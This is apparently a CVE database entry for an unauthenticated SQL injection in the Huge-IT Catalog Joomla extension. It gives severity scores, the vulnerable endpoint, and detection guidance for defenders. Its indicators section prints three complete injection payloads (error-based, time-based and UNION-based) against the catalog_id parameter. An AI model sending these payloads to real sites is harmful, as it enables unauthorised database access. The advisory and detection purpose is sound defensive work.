cbcvebase.
CVE-2016-1000125
published 2016-10-06

CVE-2016-1000125: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla

PriorityP262critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
2.50%
82.7th percentile
Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla

Affected

1 ranges
VendorProductVersion rangeFixed in
huge-ithuge-it_catalog

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://example.com/components/com_catalog/ajax_url.php
path/components/com_catalog/ajax_url.php
commandprod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
commandprod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
commandprod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
filenameajax_url.php
  • Monitor POST requests to /components/com_catalog/ajax_url.php with the parameter post=load_more_elements_into_catalog; the catalog_id parameter is unsanitized and directly concatenated into SQL queries, making it the primary injection point.
  • Detect error-based SQL injection attempts by looking for FLOOR(RAND(0)*2) and GROUP BY CONCAT patterns in POST body targeting catalog_id.
  • Detect time-based blind SQL injection by alerting on SLEEP() calls within the catalog_id POST parameter to ajax_url.php.
  • Detect UNION-based SQL injection by looking for UNION ALL SELECT with 15 columns in POST body to ajax_url.php.
  • High volume of HTTP 500 responses from ajax_url.php during a short window is a strong indicator of active SQL injection probing against this component.
  • The vulnerability is unauthenticated — no session or login is required. Any POST to ajax_url.php with post=load_more_elements_into_catalog from an unauthenticated source should be treated as suspicious.
  • ·The vulnerable endpoint ajax_url.php is directly accessible under /components/com_catalog/ without any authentication check, meaning no Joomla session token or user privilege is enforced before reaching the injectable code path.
  • ·The injection affects multiple POST parameters beyond catalog_id (old_count, count_into_page, show_thumbs, show_description, parmalink), all of which are passed unsanitized; detection rules should cover all these parameters.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.